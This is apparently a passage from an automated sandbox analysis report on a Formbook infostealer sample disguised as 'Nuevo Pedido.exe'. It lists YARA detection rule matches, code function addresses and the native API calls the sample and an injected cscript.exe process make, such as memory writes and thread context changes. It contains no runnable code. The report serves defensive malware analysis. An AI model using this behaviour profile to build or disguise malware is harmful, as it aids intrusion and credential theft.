            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Nuevo Pedido.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A85C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_02BC8250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_02BCD2F8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_05635AA0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_05635AB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00401030
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BC78
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00408C7B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00408C80
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BD01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00402D90
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BEE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00402FB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE5C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BF900
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A820A8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB090
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A828EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71002
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EEBB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7DBD2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82B28
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A822AE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A825DD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82D07
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B0D20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81D55
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C841F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7D466
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81FF1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82EF7
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D6E30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483D466
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04770D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048425DD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842D07
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04796E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841FF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048420A8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048428EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048422AE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483DBD2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842B28
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BC78
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00608C7B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00608C80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BD01
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00602D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BEE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00602FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: String function: 019BB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0477B150 appears 35 times
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004185E0 NtCreateFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00418690 NtReadFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00418710 NtClose,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004187C0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004185DA NtCreateFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041870C NtReadFile,NtClose,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004187BA NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F95D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F99D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F98A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FB040 NtSuspendThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FA3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A10 NtQuerySection,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F95F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FAD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9560 NtWriteFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FA710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019FA770 NtOpenThread,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9760 NtOpenProcess,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F96D0 NtCreateKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A80 NtOpenDirectoryObject,
